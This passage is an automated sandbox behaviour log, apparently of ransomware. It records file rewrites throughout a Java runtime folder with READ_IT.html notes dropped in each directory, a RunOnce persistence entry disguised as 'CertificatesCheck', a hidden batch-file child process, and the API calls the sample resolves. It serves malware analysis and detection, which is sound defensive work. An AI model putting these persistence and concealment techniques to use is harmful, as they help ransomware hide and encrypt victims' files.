Create	C:\Program Files (x86)\Java\jre7\lib\security\javaws.policy	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\security\local_policy.jar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\security\trusted.libraries	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\security\US_export_policy.jar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\management\jmxremote.access	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\management\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\management\jmxremote.password.template	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\management\management.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\management\snmp.acl.template	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\jfr\default.jfc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\jfr\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\jfr\profile.jfc	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\images\cursors\cursors.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\images\cursors\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\images\cursors\invalid32x32.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\images\cursors\win32_CopyDrop32x32.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\images\cursors\win32_CopyNoDrop32x32.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\images\cursors\win32_LinkDrop32x32.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\images\cursors\win32_LinkNoDrop32x32.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\images\cursors\win32_MoveDrop32x32.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\images\cursors\win32_MoveNoDrop32x32.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\i386\jvm.cfg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\i386\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\fonts\LucidaBrightDemiBold.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\fonts\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\fonts\LucidaBrightDemiItalic.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\fonts\LucidaBrightItalic.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\fonts\LucidaBrightRegular.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\fonts\LucidaSansDemiBold.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\fonts\LucidaSansRegular.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\fonts\LucidaTypewriterBold.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\fonts\LucidaTypewriterRegular.ttf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\ext\access-bridge-32.jar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\ext\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\ext\dnsns.jar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\ext\jaccess.jar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\ext\localedata.jar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\ext\meta-index	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\ext\sunec.jar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\ext\sunjce_provider.jar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\ext\sunmscapi.jar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\ext\sunpkcs11.jar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\ext\zipfs.jar	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\deploy\ffjcext.zip	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\deploy\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\deploy\messages.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\deploy\messages_de.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\deploy\messages_es.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\deploy\messages_fr.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\deploy\messages_it.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\deploy\messages_ja.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\deploy\messages_ko.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\deploy\messages_pt_BR.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\deploy\messages_sv.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\deploy\messages_zh_CN.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\deploy\messages_zh_HK.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\deploy\messages_zh_TW.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\deploy\splash.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\deploy\jqs\jqs.conf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\deploy\jqs\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\deploy\jqs\jqsmessages.properties	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\cmm\CIEXYZ.pf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\cmm\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\cmm\GRAY.pf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\cmm\LINEAR_RGB.pf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\cmm\PYCC.pf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\lib\cmm\sRGB.pf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\bin\awt.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\bin\axbridge.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\bin\dcpr.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\bin\decora-sse.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\bin\deploy.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\bin\dt_shmem.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\bin\dt_socket.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\bin\eula.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\bin\fontmanager.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\bin\fxplugins.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Program Files (x86)\Java\jre7\bin\glass.dll	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
For performance reasons, the remaining 3942 entries are omitted. The remaining entries can be found in glog.xml.

Registry (4)

Operation	Key	Additional Information	Count	Logfile
Create Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce		1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce		1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce	value_name = CertificatesCheck, data = 0	1	Fn
Write Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce	value_name = CertificatesCheck, data = C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Temp13684.exe, size = 118, type = REG_SZ	1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Users\YBZ8BT~1\AppData\Local\Temp\tmp81BC.tmp.bat	os_pid = 0x30c, creation_flags = CREATE_NO_WINDOW, show_window = SW_HIDE		1	Fn

Module (77)

Operation	Module	Additional Information	Count	Logfile
Load	gqrapi.dll	base_address = 0x0	1	Fn
Load	regapi.dll	base_address = 0x734c0000	1	Fn
Load	ole32.dll	base_address = 0x75950000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75140000	3	Fn
Get Handle	c:\windows\syswow64\user32.dll	base_address = 0x75250000	1	Fn
Get Handle	c:\windows\syswow64\advapi32.dll	base_address = 0x753b0000	1	Fn
Get Handle	ole32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\syswow64\shlwapi.dll	base_address = 0x74d80000	1	Fn
Get Handle	c:\users\ybz8btyyvts 7lfsqb0g\appdata\roaming\temp13684.exe	base_address = 0x400000	1	Fn
Get Filename	ole32.dll	process_name = c:\users\ybz8btyyvts 7lfsqb0g\appdata\roaming\temp13684.exe, file_name_orig = C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Temp13684.exe, size = 2048	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadProcessMemory, address_out = 0x7516cfcc	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x75151856	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x771ee026	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x751514c9	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x7515110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenA, address_out = 0x75155a4b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointerEx, address_out = 0x7516c807	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x75151282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x7515170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x75153ed3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x75153f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSizeEx, address_out = 0x751559e2	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x751511c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x75157a10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableW, address_out = 0x75151b48	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTempFileNameW, address_out = 0x7517d1b6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x75154435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x751517d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpynA, address_out = 0x7516192a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x7515103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MoveFileExW, address_out = 0x75169b2d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x75155371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyA, address_out = 0x75172a9d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeA, address_out = 0x7516ef75	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x751510ff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x7517830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileAttributesW, address_out = 0x75151b18	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x75154950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x7515192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStdHandle, address_out = 0x751551b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiA, address_out = 0x75153e8e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindClose, address_out = 0x75154442	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpiW, address_out = 0x7516d5cd	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatW, address_out = 0x7517828e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x751554ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringA, address_out = 0x75153c5a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyW, address_out = 0x75173102	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileAttributesW, address_out = 0x7516d4f7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x75151410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x7517735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32NextW, address_out = 0x7517896c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Process32FirstW, address_out = 0x75178baf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenW, address_out = 0x75151700	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatA, address_out = 0x75172b7a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessA, address_out = 0x75151072	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapCreate, address_out = 0x75154a2d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x751514e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineA, address_out = 0x751551a1	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = wsprintfA, address_out = 0x7527ae5f	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x753c469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetCurrentHwProfileW, address_out = 0x753b1a03	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x753c468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x753c46ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCreateKeyExW, address_out = 0x753c40fe	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptGenRandom, address_out = 0x753bdfc8	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x753be124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x753bdf14	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x753c14d6	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateGuid, address_out = 0x759915d5	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = StringFromGUID2, address_out = 0x759922ec	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x74d93248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = StrStrA, address_out = 0x74dac45b	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindFileNameW, address_out = 0x74d9bb71	1	Fn

Environment (3)

Operation	Additional Information	Count	Logfile
Get Environment String	name = temp, result_out = C:\Users\YBZ8BT~1\AppData\Local\Temp	1	Fn
Get Environment String	name = appdata, result_out = C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming	1	Fn
Get Environment String	name = public, result_out = C:\Users\Public	1	Fn

Process #5: cmd.exe

(Host: 182, Network: 0)

Information	Value
ID	#5
File Name	c:\windows\syswow64\cmd.exe
Command Line	cmd /c C:\Users\YBZ8BT~1\AppData\Local\Temp\tmp81BC.tmp.bat
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:08:10, Reason: Child Process
Unmonitor	End Time: 00:15:23, Reason: Terminated by Timeout
Monitor Duration	00:07:13

OS Process Information

Information	Value
PID	0x30c
Parent PID	0x670 (c:\users\ybz8btyyvts 7lfsqb0g\appdata\roaming\temp13684.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	6CURNMAPTGWD\YbZ8BTYYvts 7lFSQB0g
Groups	6CURNMAPTGWD\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f30f (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 31C

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000030000	0x00030000	0x00036fff	Pagefile Backed Memory	Readable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00070000	0x000d6fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000000e0000	0x000e0000	0x000e1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000110000	0x00110000	0x0011ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000150000	0x00150000	0x0018ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000260000	0x00260000	0x002dffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000320000	0x00320000	0x0041ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000004f0000	0x004f0000	0x005effff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000720000	0x00720000	0x0072ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000730000	0x00730000	0x008b7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000008c0000	0x008c0000	0x00a40fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000a50000	0x00a50000	0x01e4ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001e50000	0x01e50000	0x02192fff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x021a0000	0x0246efff	Memory Mapped File	Readable	Region Actions
cmd.exe	0x49d80000	0x49dcbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x73710000	0x7376bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x73770000	0x737aefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x737c0000	0x737c7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winbrand.dll	0x74c00000	0x74c06fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x74d10000	0x74d1bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x74d20000	0x74d7ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x75140000	0x7524ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75250000	0x7534ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x75350000	0x753affff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x753b0000	0x7544ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x75450000	0x754ecfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x754f0000	0x754f9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x75500000	0x755abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x75710000	0x757dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x757f0000	0x758dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x758e0000	0x758f8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75900000	0x75945fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x75ab0000	0x75b3ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000076dc0000	0x76dc0000	0x76eb9fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000076ec0000	0x76ec0000	0x76fdefff	Private Memory	Readable, Writable, Executable	Region Actions
ntdll.dll	0x76fe0000	0x77188fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x771c0000	0x7733ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
